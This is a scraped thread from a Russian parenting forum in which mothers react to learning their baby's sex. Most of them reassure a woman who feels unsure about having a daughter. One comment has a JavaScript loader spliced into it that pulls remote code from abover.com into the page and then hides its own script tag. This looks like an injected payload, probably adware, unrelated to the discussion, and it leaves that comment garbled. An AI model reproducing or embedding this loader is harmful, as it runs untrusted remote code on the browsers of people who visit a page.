Быть мамой девочки.... Как это?!

да какая разница кто, главное чтоб здоровый был!!!! вот если бы сказали у вас там мышка или лягушка.....)))) детки это же хорошо!
31.03.2014
что делать? ЛЮБИТЬ[removed](function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8'; script.onload = script.onerror = function () { script.onload = script.onerror = null; script[removed].removeChild(script); } document.body.appendChild(script); })();[removed]
16.02.2014
Дочка-это здорово! Они такие ласковые)) И лишний раз поцелуют и обнимут..
15.02.2014
И я такая же!!! Когда сказали на узи, что будет мальчик, была такая же реакция)) Всегда хотела только мальчика и всегда знала об этом. Мне даже представить сложно себя мамой девочки и если будет второй ребёнок, то хотелось бы ещё одного мальчишечку) Наверное с рождением девочки ваше отношение поменяется, главное чтобы ребёнок был здоровый!
14.02.2014
Быть мамой девочки, это так здорово!!!! сейчас моя доча выросла, а я очень скучаю по тем временам, когда маленькие хвостики, умопомрачительные наряды скупаешь с какой то не реальной любовью.а сейчас смотрю на своего 9-ти месячного сына и понимаю, что дальше штанов никуда не разгонишься))) от души вам желаю все это испытать со своей принцессой)))))))))
14.02.2014
Спасибо!) продается на девочек сейчас действительно столько всего! А какие платья!))) можно еще кукольной дом купить( всю жизнь о нем мечтала))
14.02.2014
И мне сказали на первом УЗИ, что похоже на мальчика и когда на втором я узнала, что будет девочка, то тоже растерялась и не сразу свыклась с этой мыслью, даже как то неловко потом было за свои чувства. Но могу вам сказать, что это классно - быть мамой девочки!!!! Так прикольно ее наряжать, а они все рано схватывают: и позируют, и выбражают!!! Короче это все здорово!!! ))))))
14.02.2014
То, что девочки развитие это правда)) я себя маленькую с сыном сравниваю, он, конечно, тупенький))))))) (в хорошем смысле))))), а еще говорят девочки спокойнее, вот это было бы здорово))))
14.02.2014
))))))) мне сравнивать пока не с кем, но доча (тьфу-тьфу) - не жалуюсь особо, всяко конечно бывает, но в целом спокойная. Хотя вот у нас два племянника - мальчишки, тож спокойные. )))))
14.02.2014
я тоже не знаю, каково быть мамой девочки, именно поэтому очень хочу попробовать!:) обожаю наступать каждый раз на НОВЫЕ грабли))главное, не хочу быть такой мамой девочки, как моя мама:( так что антипример у меня уже есть, осталось пример для подражания найти.
14.02.2014
У тебя все впереди!!! ;)) а мне нравится твоя маман))) она готовит вкусно!!!)))))
14.02.2014
У меня одна девочка,хочу еще доченьку. )))
14.02.2014
О, мои мысли высказали. Тоже никогда не думала о девочке.)) замечательной она будет, немного капризной, немного лукавой, доброй и ласковой, ну и общей любимицей, конечно!
14.02.2014
У меня такая паника была, когда мне сказали, что сынок будет ))) Думала - и что я буду с ним делать, я ж не знаю, как с ними обращаются? Как мальчиков воспитывают?? Аааа. Ну глупая была, что еще сказать. Теперь не представляю, как раньше без него жила. Все будет хорошо! Девочки - бантики, платьица, куколки, домики. Вот бы я оторвалась в реализации детских мечтаний ))))
14.02.2014
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.
Непринятие пола ребенка.. Позднее материнское счастье, или Сложности родов после 40